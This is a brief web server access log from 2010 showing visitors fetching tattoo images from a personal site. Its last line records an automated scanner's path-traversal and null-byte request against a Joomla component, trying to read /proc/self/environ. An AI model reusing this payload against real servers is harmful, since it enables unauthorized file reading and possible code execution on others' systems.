75.136.101.43 - - [02/May/2010:14:02:24 -0500] "GET /tattoo/tate4.JPG HTTP/1.1" 200 18555 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2) Gecko/20100325 Ubuntu/9.04 (jaunty) Firefox/3.6.3"
75.136.101.43 - - [02/May/2010:14:02:24 -0500] "GET /tattoo/tate3.JPG HTTP/1.1" 200 16409 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2) Gecko/20100325 Ubuntu/9.04 (jaunty) Firefox/3.6.3"
75.136.101.43 - - [02/May/2010:14:02:24 -0500] "GET /tattoo/tate2.JPG HTTP/1.1" 200 13891 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2) Gecko/20100325 Ubuntu/9.04 (jaunty) Firefox/3.6.3"
72.18.155.234 - - [02/May/2010:14:04:47 -0500] "GET /logs/index2.php?option=com_feederator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.812"
